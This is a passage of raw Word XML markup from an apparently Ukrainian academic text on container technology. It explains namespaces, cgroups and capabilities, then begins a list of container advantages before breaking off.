      <w:r w:rsidR="008670DF" w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008670DF" w:rsidRPr="008670DF" w:rsidRDefault="008670DF" w:rsidP="008670DF">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8670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Namespaces</w:t>
      </w:r>
      <w:r w:rsidR="005B5269">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>це механізм</w:t>
      </w:r>
      <w:r w:rsidR="005B5269">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Рис.</w:t>
      </w:r>
      <w:r w:rsidR="002865BF" w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1.4.</w:t>
      </w:r>
      <w:r w:rsidR="005B5269">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, який відповідає за ізоляцію різних аспектів системи, таких як процеси, мережеві інтерфейс</w:t>
      </w:r>
      <w:r w:rsidR="005B5269">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>и та файлові системи. Завдяки Namespaces</w:t>
      </w:r>
      <w:r w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> кожен контейнер має своє окреме середовище, де </w:t>
      </w:r>
      <w:r w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>виглядає як самостійна система, навіть якщо насправді він використовує спільне ядро з іншими контейнерами. Це дозволяє контейнерам бути ізольованими один від одного та від хостової системи, при цьому забезпечуючи необхідну функціональність.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008670DF" w:rsidRDefault="005B5269" w:rsidP="005B5269">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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4737516" cy="23114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301"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4753375" cy="2319138"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B5269" w:rsidRPr="003C7FE5" w:rsidRDefault="002865BF" w:rsidP="005B5269">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Рисунок</w:t>
      </w:r>
      <w:r w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.4. –</w:t>
      </w:r>
      <w:r w:rsidR="005B5269">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B5269" w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Namespaces</w:t>
      </w:r>
      <w:r w:rsidR="005B5269">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B5269" w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>механізм</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B5269" w:rsidRDefault="005B5269" w:rsidP="008670DF">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p>
    <w:p w:rsidR="008670DF" w:rsidRPr="008670DF" w:rsidRDefault="008670DF" w:rsidP="008670DF">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8670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Cgroups (Control Groups)</w:t>
      </w:r>
      <w:r w:rsidR="008C1502">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>це механізм</w:t>
      </w:r>
      <w:r w:rsidR="008D779C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Рис.</w:t>
      </w:r>
      <w:r w:rsidR="002865BF" w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1.5.</w:t>
      </w:r>
      <w:r w:rsidR="008D779C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, що дозволяє обмежувати та контролювати використання ресурсів, таки</w:t>
      </w:r>
      <w:r w:rsidR="008C1502">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>х як процесорний час (CPU), пам’</w:t>
      </w:r>
      <w:r w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">ять, мережеві ресурси </w:t>
      </w:r>
      <w:r w:rsidR="008C1502">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>тощо, для кожного контейнера. Cgroups</w:t>
      </w:r>
      <w:r w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> забезпечують, щоб жоден контейнер не перевищував ліміти ресурсів, встановлені для нього, що дозволяє запобігти </w:t>
      </w:r>
      <w:r w:rsidR="008C1502">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>голодуванню</w:t>
      </w:r>
      <w:r w:rsidR="008C1502">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> інших контейнерів та забезпечити справедливий розподіл ресурсів на хостовій машині.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C1502" w:rsidRDefault="008D779C" w:rsidP="008D779C">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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2171494" cy="533400"/>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417" t="76288" r="7979" b="3424"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2224744" cy="546480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D779C" w:rsidRPr="003C7FE5" w:rsidRDefault="002865BF" w:rsidP="008D779C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>1.5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="008D779C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D779C" w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Cgroups (Control Groups)</w:t>
      </w:r>
      <w:r w:rsidR="008D779C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D779C" w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>механізм</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C1502" w:rsidRDefault="008C1502" w:rsidP="008670DF">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p>
    <w:p w:rsidR="008670DF" w:rsidRDefault="008670DF" w:rsidP="008670DF">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8670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:r w:rsidR="00D43D38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>цей механізм дозволяє тонко налаштувати доступ до певних привілеїв та системних викликів для процесів у контейнері. Завдяки Capabilities</w:t>
      </w:r>
      <w:r w:rsidR="00D43D38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">можна делегувати певні адміністративні права (наприклад, доступ до мережевих інтерфейсів або зміну привілеїв), не надаючи контейнеру </w:t>
      </w:r>
      <w:r w:rsidRPr="008670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>повних прав адміністратора (root). Це дозволяє значно підвищити безпеку, обмежуючи привілеї контейнерів лише до необхідних для їх роботи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008670DF" w:rsidRDefault="008670DF" w:rsidP="008670DF">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8670DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Завдяки цим механізмам контейнерна технологія забезпечує високу ефективність, масштабованість та безпеку, одночасно даючи можливість ізолювати ресурси і процеси в межах одного хоста.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="002865BF" w:rsidP="00CB205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en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00B7322A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Основними п</w:t>
      </w:r>
      <w:r w:rsidR="00B7322A" w:rsidRPr="000B0BB1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ереваг</w:t>
      </w:r>
      <w:r w:rsidR="00B7322A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ами контейнерів є</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [8]</w:t>
      </w:r>
      <w:r w:rsidR="00B7322A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="00B7322A" w:rsidP="00CB205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Легкість.</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Контейнери значно легші, ніж віртуальні машини, оскільки не потребують окремої </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="00B7322A" w:rsidP="00CB205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Швидкість.</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Контейнери можуть запускатися за лічені секунди.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB205D" w:rsidRPr="00CB205D" w:rsidRDefault="00B7322A" w:rsidP="00CB205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Масштабованість.</w:t>
      </w:r>
      <w:r w:rsidR="00CB205D" w:rsidRPr="00CB205D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Завдяки оркестра</w:t>
      </w:r>
      <w:r>
        <w:rPr>
